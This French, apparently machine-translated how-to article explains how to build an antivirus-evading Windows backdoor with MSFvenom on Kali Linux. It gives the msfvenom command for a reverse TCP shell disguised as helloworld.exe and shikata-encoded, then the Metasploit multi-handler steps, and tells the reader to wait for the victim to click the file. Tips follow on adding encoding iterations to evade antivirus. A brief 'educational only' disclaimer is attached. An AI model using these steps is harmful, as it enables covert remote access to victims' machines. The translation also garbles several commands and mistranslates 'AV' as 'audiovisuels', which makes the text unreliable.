Comment créer une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux?

Tapez msfvenom -l encoders pour afficher la liste des encodeurs.
Une porte dérobée est utilisée pour contourner les mécanismes de sécurité, souvent secrètement et le plus souvent de manière indétectable. En utilisant MSFvenom, la combinaison de msfpayload et msfencode, il est possible de créer une porte dérobée qui se reconnecte à l'attaquant en utilisant le protocole TCP inversé. Afin de développer une porte dérobée, vous devez modifier la signature de votre malware pour échapper à tout logiciel antivirus. Terminez ce projet sur une paire d'ordinateurs auxquels vous êtes autorisé à accéder et, ce faisant, vous en apprendrez plus sur la sécurité informatique et le fonctionnement de ce type de porte dérobée.
- 1Démarrez kali et lancez la console du terminal.
- 2Tapez ifconfig pour afficher l'interface et vérifiez votre adresse IP.
- 3Tapez msfvenom -l encoders pour afficher la liste des encodeurs.
- Vous utiliserez x86/shikata_ga_nai comme encodeur.
- 4Tapez "msfvenom -a x86 - platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 lport = 4444 -b" \ x00" -e x86 / shikata_ga_nai -f exe> helloworld.exe
- -a x86 - platform windows désigne l'architecture à utiliser.
- -p windows/shell/reverse_tcp désigne les charges utiles à intégrer.
- LHOST désigne l'adresse IP de l'auditeur.
- LPORT désigne le port d'écoute.
- -b "\x00" désigne pour éviter les mauvais caractères (octets nuls).
- -e x86/shikata_ga_nai désigne le nom des encodeurs.
- -f exe > helloWorld.exe désigne la sortie de format.
- 5Tapez msfconsole pour activer le metasploit.
- Vous avez maintenant généré votre porte dérobée. Lorsque la victime clique sur helloWorld.exe, la charge utile du shell intégrée est activée et se reconnecte à votre système. Pour recevoir la connexion, vous devez ouvrir le multi-handler dans Metasploit et définir les charges utiles.
- 6Tapez use exploit/multi/handler.
- 7Tapez set payload windows/shell/reverse_tcp.
- 8Tapez show options pour vérifier le module.
- 9Tapez set LHOST 192,168.48,129.
- "LHOST" désigne l'adresse IP de l'auditeur.
- 10Tapez set LPORT 4444.
- "LPORT" désigne le port d'écoute.
- 11Tapez run et attendez la connexion de la machine de la victime.
- 12Attendez que la victime clique sur helloworld.exe. Ensuite, vous serez connecté avec succès à la machine de la victime.

Tapez set payload windows / shell / reverse_tcp.
- L'utilisation de -i <nombres> dans MSFvenom représentera les itérations de l'encodage. Parfois, plus d'itérations peuvent aider à contourner le logiciel AV.
- Vous avez appris à générer la porte dérobée et l'encodage à l'aide de MSFvenom, mais cette méthode ne fonctionnera pas parfaitement avec certains logiciels audiovisuels de nos jours. La raison derrière cela est à cause des modèles d'exécution dans MSFvenom. Les fournisseurs audiovisuels ont ajouté la signature statique de ces modèles et les recherchent simplement. La solution à ce problème consiste à utiliser un modèle d'exécution différent ou des outils différents.
- Cet article est uniquement à des fins éducatives. Le piratage sans autorisation ou permission est contraire à l'éthique et souvent illégal.
- Kali Linux
- les fenêtres
- Machine virtuelle
- VirtualBox
- VMware
Questions et réponses
- Que dois-je faire si une erreur apparaît lors de la création de l'exploit?Assurez-vous que vous avez tout fait correctement et réessayez. Assurez-vous que vous exécutez Kali Linux.